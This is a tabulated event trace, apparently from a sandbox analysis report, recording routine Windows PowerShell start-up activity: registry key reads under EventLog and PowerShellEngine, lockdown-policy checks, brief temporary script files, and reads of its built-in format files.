| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = USERPROFILE, result_out = C:\Users\Nd9E1FYi |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1, size = 1 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1, size = 1 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1, type = file_attributes |
|
1 | |
| File | Delete | filename = C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
3 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 537 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
33 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3055 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 17, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 950 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
68 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 452 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
3 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
